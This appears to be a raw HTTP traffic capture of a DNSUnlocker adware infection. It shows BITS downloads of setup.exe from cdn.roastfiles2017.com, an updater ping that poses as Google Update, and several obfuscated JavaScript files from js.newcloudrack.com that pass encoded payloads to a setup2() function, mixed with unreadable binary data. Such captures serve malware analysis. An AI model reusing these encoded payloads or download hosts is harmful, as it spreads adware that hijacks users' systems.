    =.k-..X..m.e....q...<.n.. ..'g%0.O.........."....G....E..]Cf!.2Z.q.......=0.....D......).i..4-...@. ..;.....kw{.......&.Z.].O6......O...GYf.$.i.<u.....3!.z5.I......K.,............K..*.nH...$..eV...(z...n.\3V.~.V./.(.......9.D..h...h.N.EI...pW......6..~V|`nL.,.....!-....Y.1.V...j......K.....D......8@.@v.#.......$..(..W.pb..T.7..C.4.........f....Z.~G.m`.8J...j.-;....;....S..{....wY..S.l8'...6p..d.m.....,Y@I.Y..Z...).y.#...s..,R...,H...O.H.,.K....)~C..<2..#,'.....B#..!B..."..D..g.Z.......V..5. z..q...Y.....-=.....SdXP.....E.f,u.\Ql.2....r.(2}.yI....t...p......fHQ.......d.....{.2m1.......o;Y.g.hC......G%.........Z...m..6.....l...8.7Pr[.g.a.>.9..=...>r...\FS.t...m.Jz}....\y...V^ra3.......}.......x.a...(Z.r.C..pE'..i...9..Nu1.bK.G...-.U.irpz.!2.(_E..<. ..D`Q.VL....R.i.-Lp9H.s...N...sY.{$4.Z*U....P.D./G`.H.KF...;.....e..!.Z..........nO.b.u..66x G.Q.w.J.c,..l......p?..5.3..X.....uF.H..yh...........x.x14...p...W9...P.O.T.@s..%..ko...k.{s .(P..%..X..I.Q..F.E.'&]..k........2"c.....9..J.f..&.5..:D..g.j...uD\..5. .M...f3^.p.>A..C^Q.._A....A.A.g.......!..i&..<q....n.C.4..*zj......NM.8l..8<R.....Wc..0..O..S\.....|a....X.#.....S....D#..z....%..x.....#..Z.3..~D...lJ.......~".C..8....!I.I..1.&.?...63X.6.!.n..GH.|.b.q."p..v.....Tj...?..uKl..J.@.cj.#...5.f.........f4..{V..GaF.%({o.C`..f,...8T.....:.B8...x.....].........{....`...'..4:.f:6-.V.T[...h..r.SJ8......f.,....o.....3..r.S....`..N.3.'(.D...q.;..j.Z.{2...X..A..._...%..m.r...L#X)...l..B'....@......{../..0h...N.0.1(.!.IA2.g$.#.S*.&'w...c..X\.a=.m...."

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=382775-754213

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:47 GMT

    Via: 1.1 varnish

    Age: 1615

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 1011

    X-Timer: S1456422167.543334,VS0,VE0

    Content-Range: bytes 382775-754213/1153385

    Content-Length: 371439

    zg.#...d.!.i...E..oKM.iN.H|.....(rA...AX'z. .>.b.7.G..j...~X..9/iX...u...f.8........Lu....5...'\....-...............7..h...QV..F~....K.xS.bc. 5.\...V..Otg.&.z.mI.*....im.&w....... ..4FH;.0.]..4.M.....*.J,J...VJ.x.......]..^...E...fJ8N.k .#x4..}...._..aT.4.Z*..cf=.p.E.(.......R\..L.....!trA.......xQ].xB......S.O;1..-#....y?O.rrW|dR....] ..|.:.rE...D./.....R1.H.&..[#-...Q..............V...h.V..`..T....z g.!"...$.o,...H*.&..S.W..j....3.......];V5.-3.LV .Dm!...e..|.m..5.R...wm...a...).D.G..E@9Q.u.$.}...A.BAt...=.AL..4......0..g6...k.F'.../...)M.o.'D{C..>E..#E.D.N.H`1g..z.J1d@....E...f.....q.%.......h.....x?B...i..@\..0_.^...7z.{GS..I....%K.b.B....y#.|.....k...=..Dp_r....2u...l..9vStQ9.i.H.~n_O....{..e.=.W....CB....ck:...........D2.f.....d......v..w..v.K.4w...6.W.(..R\..}-...e..B..i.W.....x....e..;Z..`.......M..[9.g".......~...C.h..>....q#......fn.....3lz...2Z.2.&....... ..;....n..0.'W....T..0t.k.c......{..v.f....0.2...`.......&.; ....7......V`.9..t`.>j........T.D.....d..3....&..3.N.r.k....v=F(............w.!..4..q....n_)s.....b..9.....3.T.tc......[.p...i$.R7@.J.P.j......o..._Q../a......y..Ze8.b.=.........A:.......w.^...A..........'J..q.6.p.A.\.`*q<)..d...v..;J...jJ../6..s.....e.=Bh.&.......86..&....'.Xk....w..>2..7...R-RB..2..r.m... .ELF.c....%c.....Vs.r.wt .r.=S......d.....J.........k$...u..M..Ln......I.r...... s....x.L(..'.....c..Y2...W.K.u..B&yB,...-..1.......b.(uz........./tt...?......'..wx.\; ...H......&.!.f.:.._N...hN.p...0 ..U.W.}...#..y..a~..F.....o.....`..G.PP1.8.hz..3...q..2..~.......D).

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=754214-1153384

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:48 GMT

    Via: 1.1 varnish

    Age: 1616

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 1015

    X-Timer: S1456422168.607492,VS0,VE0

    Content-Range: bytes 754214-1153384/1153385

    Content-Length: 399171

    )....Xk.~......:.........,.s.b...`...1d...3.v'xI.w...`..........h.G........:...ET.|..SY..0...qcFOS....6.b..yV/_[.".i7..K[..........j..z..G..3................Qa..r._.Oc.R..*~.R.....Q....(.G..2.........l..T..0.k.w..U..BQ..v^.{?B..&..t.%M.<H*..F...c..[c.7..C.R.Q..e..x._.3....t...E.{...H.....7........Y6.r."9G.V........^9.?...s.(...;!..,q..J..6...v..! ...y.3s#..5@....Q.P.@..2.J...........x....T..?($h..-....k....t(Zl.....X....</u...=`........<:.....C....5.....i....gm@.x.*W.Z4.g......7.p..9...~..A...=..l...f....a...mg.'.#...4Yu.xA.y|...K~<F.G]....x.....q5.^.k.X.../.g.......KJK...)..5..g..;.yD.6^k....k.....|8.h.*.8...r.XB.9...f..l..x&9...z..L.,.7n...^....0....*...k.L2.......8.]-...w.........C...V7#a..9S.c\47,w.v.]Egq"......#{.I.C..l.m.....sE..qF....2..).m},......9.j...A..m.....s./i..C..H...p.H..Fm.....U../D3...8.T........'.....J.l.O..U..$r...|......[..?.Zl#..O(G..>..z...X.rZj!..vN.W......1.f.$=..Q.^..9...jcl....[*}..[....M....B...`...x<..p..#..#..N.,'.......0~.|.n.<Ri.>}9..m..m....&..n.4L....."...../.e....4[d.G$....g...K.!.i..x...f...jS..o..a...z..[..J5..k.....H..U .d.E..A.L.Q'C..Z/....w.f..M...B..<8.~Qp.9l..}9.().(4=.~.%.3v>g,BS'.........oEO.^...8C.AH^.&...?..x...?#!...s....R..M.u.W...J.....RlL.h.1.V.z....J*c....n2...HT>n....$..^...V....]...]..R.'..}.d?.Y..V....DXrl....*.4.i.. ~...Jl..o.....\.N...[...*..CSr...k..;....r.B.iT.!*Jd......8..YBGx.....;.._Awb!W...b{$...`..u.Z...../...}...V.e...)0.R...C.).......`..[........vb.~O.(3...3..N=.....0..2^.Z[!...^...|.".... ...a6g.6.z..AWy.>r/.V.

    <<< skipped >>>

    GET /installer_updates/002201/update.json HTTP/1.1

    User-Agent: NSIS_Inetc (Mozilla)

    Host: update.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:14 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1410796465"

    Last-Modified: Mon, 15 Sep 2014 15:54:25 GMT

    Cache-Control: max-age=21600

    Content-Length: 39

    Content-Type: text/plain; charset=UTF-8

    X-HW: 1456422134.dop005.fr7.t,1456422134.cds020.fr7.s,1456422134.dop003.se1.r,1456422134.cds013.se1.p,1456422134.cds020.fr7.p

    {"update_from_version":"NA","url":"NA"}..

    GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 HTTP/1.1

    User-Agent: Google Update/1.3.25.0;winhttp

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    Host: update.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:22 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1454602831"

    Last-Modified: Thu, 04 Feb 2016 16:20:31 GMT

    Cache-Control: max-age=12635

    Content-Length: 229

    Content-Type: text/xml; charset=UTF-8

    X-HW: 1456422142.dop010.fr7.t,1456422142.cds047.fr7.c

    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56754"/>. <app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">. .<event status="ok"/>. </app>.</response>...

    GET /plugins/mins/424.js?ver=3&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1435500466"

    Last-Modified: Sun, 28 Jun 2015 14:07:46 GMT

    Cache-Control: max-age=900

    Content-Length: 1855

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop006.fr7.t,1456422148.cds005.fr7.c

    if (typeof setup2 === 'function') { setup2('MTY1MzBiMWUwMjFiMjUxMTFhNGM1NzUzMGIxZTAyMWI0YTRjNTkxZDVlNWYwMjA3MTcxMTFmMGQxNzE5MWU1ZjAwMDUxYjQ0MTUxYjAyNWY0MzA2MDYwODA1MDQxYzBlMTkwMDQzMTIwYzA3NTkxYzAzM2MxOTBjMGIyZTBiMDcyOTE4MDMwMTI5NDAwNzAyNWMwOTE3MDYwMDAyMWYwOTAzMzgwNzU3MjkzNDMzMzEzOTNkM2UyMzJhMmUzMzM5MmYyMDM3MjMzZDJlMmEyZTI5MzQ1NjAwMTkxYjAzMDUxMTEzMzUwNDE0MDY0YjMxMzIzMjMxMjUyNTM4MjIyYTMyMmIzZjJlMjAyNTIzMjUyNDMxMmYzMTJlM2UyNzJmMjkzNDU2MGExODFkMTkxMDBmMDYxNzFmMTkwYzE4M2EwNDFjMDY1NzI5MzQzMzMxMzkzZDNlMjMyYTJlMzMzOTJmMmEzODNkMzkzMDJmMjYyOTNmMzkyZTMzMzEzMjU3MDIxYTA2MjIzNDVlMjkzMTJlMjMyYzM5MjUzOTM5MjczMzNjMzIzMDMzM2EyOTIyMzQzYzI5NDgyNDMzMmEyOTRiMzQyZjIwMjQyMTNlMjIzMTIzMzIyZTIyM2MzZjIwM2UyNTIyMjYzYTJlMjIzYzIzM2QyODIzM2MyMzMyMzQyZjQ1MTcxZTFkM2YwMjA3MTM1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmYzZDIxM2MyNDM3MjYzNTNjMjk0ODFlMDQwMTIzMzI1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmIzNTI1MjYyNDMyMmUzNDNjMjUzYjJmMmUyYTJlMjkzNDUyNGY1NDA2MTkwNTEzMTkyMzE5MWM0MTRjNGMwNTA1MTcxYTA1NTE1ZjRjMDU1ZDQzMTAwZTBiMGMwNDFlMDIwMTFkNDMxMjBjMDc1OTBlMDgxNzQ3NDAxYTE0MDExOTE5MDcxZDBjMTg0MDBlMWUwZTQ1MDExODJmMGMxNDA4MzIxOTBlMzUwNTE4MTIzYzU4MDQxZTRlMDAwYjFiMWIxMTBhMTEwMDI0MTU1ZTM1MjkyODIyMmMyNTNkM2YzODI3MmYyNDM0MzMyMjNiM2UzMjM4MjczNTI5NGQxMzBjMDMwMDE5MDMxYTI5MTkwZjE1NWUyOTMxMmUyMzJjMzkyNTM5MzkyNzMzM2MzMjMyMmMzZjM4M2YyMjNhMjkyZDIyMzUyNjM1Mjk0ZDE5MGQwNTFhMGMxZDBmMGIwMjAyMWYwZDIyMDcwMDE0NWUzNTI5MjgyMjJjMjUzZDNmMzgyNzJmMjQzNDM5MmQyNTNhMmMzZDJmMzUyMjIyM2QyNjI5MzE0YjEwMTMxYTNmMmY0ZDNjMjkyZDNmM2UzMDM5MjQyMjM0MjYyNDMxMmMyMTMzMzUzZjJmMmYzYzUwMjcyZjM4MjA1NzI5MzQzMzMxMzkz

    <<< skipped >>>

    GET /plugins/mins/223.js?ver=9&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1418314404"

    Last-Modified: Thu, 11 Dec 2014 16:13:24 GMT

    Cache-Control: max-age=900

    Content-Length: 823

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop006.fr7.t,1456422148.cds007.fr7.c

    if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }....

    GET /plugins/mins/273.js?ver=6&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1418314330"

    Last-Modified: Thu, 11 Dec 2014 16:12:10 GMT

    Cache-Control: max-age=900

    Content-Length: 903

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop006.fr7.t,1456422148.cds007.fr7.c

    if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMDAxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNTE3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIzNTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MWYwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJjMzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYjE0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIxMTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNTIxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNmMmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNjNlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }....

    GET /plugins/mins/311.js?ver=4&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1434015478"

    Last-Modified: Thu, 11 Jun 2015 09:37:58 GMT

    Cache-Control: max-age=900

    Content-Length: 1055

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop006.fr7.t,1456422148.cds062.fr7.c

    if (typeof setup2 === 'function') { setup2('MWE3NDZlNDM0NTUxNTE0OTFlMWUxNTA5MzExMTA5NTM0YjRiNTQwMjE1MGQxNDU5NGE1ZTE4NDUxNTE4MDMxZjA5MDAwZjAyNWYwMjE4MGMwZTU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcxOTA1MWYwNjE5MzQwYjA4NDE1ZjUxNTMwMzAyMWUxMTBhNWU0YzRhMTgyZTA4MDQwODA3MTQwNzA5MTYyZTE4MDUxMDA1NGYwZDA4MTAwNjE1MWY0NTE1MDUwYzU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcwMTFkMWUxMTAzMGYzMDAwNDE1ZjUxNDI1YTQ3Njc2YjA0', 'aydceqqkvj'); }....

    GET /plugins/mins/380.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1424181436"

    Last-Modified: Tue, 17 Feb 2015 13:57:16 GMT

    Cache-Control: max-age=582

    Content-Length: 1303

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop006.fr7.t,1456422148.cds004.fr7.c

    if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMGEwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYjJlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYwYjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExNDYwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAyNWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0ODBmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgwNzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0MzQyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMDM3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMDAwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMzMzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTExMTExMTYwNTE2MDY0YjM2M2MwNDEyMWUyNzA2MWMxZTNhMzY1ZTRkMzkyNzNiMzMzNjIyMzYzYjJhMmUyMzJhMjcyMjM2MjQyYjNkMzEzMzM5M2IzNzI1M2MyZTNhNGU1ODFkMGYxNjFjMGUwZTVmM2EzNjBkMWUwMDI3MTYwMDE0MTQzYTM2NWU0ZDM5MjczYjMzMzYyMjM2M2IyYTJlMjMyYTI3MjAyOTIxM2EyNzIyMjcyMzI3Mjc0NjQyNTM2ZjE0', 'ayqeicjfxx'); }....

    <<< skipped >>>

    GET /plugins/mins/184.js?ver=11&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1420026483"

    Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT

    Cache-Control: max-age=900

    Content-Length: 1231

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop006.fr7.t,1456422148.cds027.fr7.c

    if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzODM3MmUzNDI0MjYyNTQwMzgxZjA4MTUwZDE4MTMzMDFlNWIzMzJmMjQyYjIwMmEzMjJiMzMyMjI5MjIzODNjMzcyZDI0MzczZTIzMjgyZjM0MmMyZDI2MjgzZDI1Mzk0ZTVjNmQ3MDRkMDkwZDBjMWQwZjAyMzkwMzViNTU1OTUwNDE0ZTZjMTE3YQ==', 'yayzflpgyo'); }....

    <<< skipped >>>

    GET /plugins/mins/102.js?ver=15&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1426423396"

    Last-Modified: Sun, 15 Mar 2015 12:43:16 GMT

    Cache-Control: max-age=900

    Content-Length: 1023

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop006.fr7.t,1456422148.cds035.fr7.c

    if (typeof setup2 === 'function') { setup2('MDM3YTU0NTU1NTU1NDYxODFmMWEwODI1MDYxOTU3NGY0NDUyMDMxYTBjMDA0ZTVhNWExYzRhMTMxOTBjMGIxYTA3NWIxYzFiMDIxZjQ0MGQwYTEyMTI1YTFmMTQxMjExMTgwZDBhMTkwNDAxNWIxZjE3NGYwODA2MTkxZTFhMTAxOTQ4MDcwMjBmMWMyNzJmMmIzNjI3M2EzNzIzMzkyNzNjMzUyNjJhMzAyZDMwMzUyNTJhM2QzNDJiMjYyMDM3M2IzOTJmMzEyNzU2MTUwNTA1MjEwZDA0MDcwYjQ1MmYyYjM2MjczYTM3MjMzOTI3M2MzNTI2MmEzNDI1MzQyZjI1MmYzNTM1MmIyYTUzMWQwZDE0NTYzMTI3MzMyNjNhMjYyNjM2MzkyZjJiMmEyZjIxMjYzMDI3M2IzOTJmMzEyNzUyNTg3ZjU1NTU0NDUwNDkwNjBjMDQwNDA2MjAwNzA4NTI1MTRlNWExODAwMDEwNTA2NWU1ZjQ0MDcyNzEzMDYxNzA2MWYxNzJmMDIwMDFlMWY1YTAxMTkwNjA3MTQwNTQwMWIxZjE5NWExNjA3MDYxNjQ0MDQxOTA2MTUwNjE2MDcwZDAwMWY0MDEyMDM0YjE2MWQxNDBhMWUwZTAyNDUxMzA2MTEwNzJhM2IyZjI4M2MzNzIzMjcyNzNjMzEyMTIyMzQyYjIwMjQzMTNiMzEzMDIwMmYzODNiM2EyZjNkMzEyYTJhNDIxMTFiMWUyYzE5MDAxOTEwNDgzYjJmMjgzYzM3MjMyNzI3M2MzMTIxMjIzNDJmMjgyMDJiM2IzNDM4MjEyZjM0NDgxMDE5MTA0ODJhMmEyNzIyMjQzZDJiMjIzZDMxMzAyNzNiMjUzODJiMmEyZjNkMzEyYTJhNDY1YzYxNGU1ODUwNTQ1NzA1MTkxMTE3MDIwMDMxMTQ1NjRmNTU0NDU0NDI2MTEz', 'xptuuudpkn'); }....

    GET /plugins/mins/376.js?ver=12&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

